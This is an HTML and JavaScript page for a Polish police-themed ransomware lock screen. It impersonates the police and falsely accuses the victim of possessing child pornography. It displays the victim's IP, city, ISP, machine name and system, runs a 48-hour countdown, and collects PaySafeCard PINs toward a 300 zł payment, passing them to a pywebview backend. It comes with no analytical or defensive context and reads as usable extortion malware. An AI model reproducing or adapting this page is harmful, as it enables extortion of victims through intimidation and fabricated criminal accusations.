<!DOCTYPE html>
<HTML>
    <HEAD>
      <TITLE>Zatrzymanie</TITLE>
      <meta charset="utf-8"> 
      <style>
        html, body { height: 100%; width: 100%; margin: 0; }
        #sendButton:hover{
          background-color:lawngreen;
        }
        .normalFont{
            font-size: 1vw;
            font-weight: bold;
        }

        .bigFont{
          font-size: 1.2vw;
          font-weight: bold;
        }
      </style>
    </HEAD>
    
    <body style="margin:0;padding:0">
        <script>
            function sendMoney(){
                var money = 0
                if(document.getElementById("0").selected){
                    money = 0
                }else if(document.getElementById("20").selected){
                    money = 20
                }else if(document.getElementById("30").selected){
                    money = 30
                }else if(document.getElementById("50").selected){
                    money = 50
                }else if(document.getElementById("100").selected){
                    money = 100
                }else if(document.getElementById("200").selected){
                    money = 200
                }
                var pin = document.getElementById("pin").value;
                document.getElementById("pin").value = ""
                pywebview.api.validatePin(pin, money);
            }

            function setVictimInfo(ip, city, isp, name, system){
                document.getElementById("ip").innerText = "Ip:"+ip;
                document.getElementById("city").innerText = "Miasto: "+city;
                document.getElementById("isp").innerText = "ISP: "+isp;
                document.getElementById("name").innerText = "Nazwa: "+name;
                document.getElementById("system").innerText = "System: "+system;
            } 

            function setMoney(money){
                document.getElementById("paid").innerText = "Zapłacono "+money+" zł z 300 zł.";
            }

            function setError(error){
                document.getElementById("error").innerText = error;
            }
        </script>
    
      <div>
        <img src="https://my-images.github.io/policja.png" height="23%" width="100%"></img>
      </div>
    
      <div style="border: 1px solid gray; height:70%; width:57%; margin: 2%; float: left;">
    
        <div style="background-color: black; color: white; margin: 1%; padding: 1%;">
    
          <table style="width: auto; table-layout: fixed">
            <tr>
              <td style="margin: 0.3%; color: white; width: 57%;">
                <div>
                  <H2 class="bigFont" id="ip" style="color: green; margin: 2%;">Ip:</H2>
                  <H2 class="bigFont"  style="margin: 2%;">Kraj: Polska</H2>
                  <H2 class="bigFont" id="city" style="margin: 2%;">Miasto: </H2>
                  <H2 class="bigFont" id="isp" style="margin: 2%;">ISP: </H2>
                  <H2 class="bigFont" id="name" style="margin: 2%;">Nazwa: </H2>
                  <H2 class="bigFont" id="system" style="margin: 2%;">System:</H2>
                </div>
    
              </td>
    
              <td>
                <img src="https://my-images.github.io/sad.jpg" style="float: left;" width="100%" alt="sad"></img>
              </td>
            </tr>
          </table>
        </div>
    
        <div style="margin: 2%;">
          <H2 style="color: red; text-align: center;" class="bigFont">Twój komputer został zablokowany ze względu na
            bezpieczeństwo!</H2>
            <span class="normalFont">
                Jesteś oskarżony o przeglądanie/przechowywania, dodawanie/lub rozpowszechnianie
            zakazanej pornografii (pornografii dziecięcej, zoofilii / gwałtu itp.). Naruszyłeś światową deklaracją o
            nierozprzestrzenianiu pornografii dziecięcej, jesteś oskarżony o popełnienie przestępstwa przewidzianego przez
            Art. 202.
            </span>
        </div>
      </div>
    
    
      <div
        style="border: 1px solid gray; height:70%; width:36%; margin-left: 0%; margin-right: 2%; margin-top: 2%;  float: right;">
        <div style="text-align: center;">
            <h3 id="time" class="bigFont" style="color:red;">pozostały czas: 48:00:00</h3>
          <img src="https://my-images.github.io/psc.png" width="58%" height="17%" alt="">
        </div>
    
        <div style="margin: 3%;">
          <h2 class="normalFont">16-znakowy PIN PaySafeCard:</h2>
          <input id="pin" style="font-size: 22px; width: 48%;" type="text">
          <!-- <input type="text" id="demo" name="comboboxdemo" /> -->
          <select id="money" name="optionlist" style="font-size: 22px; margin-left: 2%;">
            <option id="0" value=""></option>
            <option id="20" value="20 zł">20 zł</option>
            <option id="30" value="30 zł">30 zł</option>
            <option id="50" value="50 zł">50 zł</option>
            <option id="100" value="100 zł">100 zł</option>
            <option id="200" value="200 zł">200 zł</option>
          </select>
        </div>
    
        <div style="margin: 3%;"> 
          <button id="sendButton" onclick="sendMoney()" style="background-color: forestgreen; border: none; font-size: 22px; color: white; width: 36%;">Zapłać</button>
          <span id="error" style="font-size: 20px; color: red; font-weight: bold;"></span>
        </div>
    
        <div style="margin: 3%;">
          <span class="normalFont">
            <div id="paid">Zapłacono 0 zł z 300 zł.</div>
            Po opłaceniu kwoty musisz odczekać kilka godzin.
          </span>
        </div>
    
        <div style="margin: 3%; color: cornflowerblue;">
          <H2 class="bigFont" style="text-align: center;">Gdzie mogę dostać paysafecard?</H2>
        </div>
    
        <div style="margin: 3%;">
          <span class="normalFont">
            Paysafecard można kupić w wielu supermarketach, kioskach ruchu i na stacjach benzynowych na całym świecie. Między innymi Empik, Lotos, Media Expert, Pepco, Żabka, Carrefour, Poczta Polska, Intermarche, PSS Społem, Lewiatan oferują sprzedaż paysafecard.
          </span>
        </div>
      </div>
    
      <script>

        var s = 0;
        var timer = document.getElementById("time");
        function startTimer(secs){
          s = secs;
          setInterval(function(){
            s -= 1;
            var h = s / 3600;
            h = parseInt(h);
            var m = (s-(h*3600))/60;
            m = parseInt(m);
            var ss = (s-(h*3600))-m*60;
            timer.innerText = "pozostały czas: "+parseInt(h)+":"+parseInt(m)+":"+parseInt(ss);
          
          },1000);
        }
        
       
      </script>
     
    </body>
    
</HTML>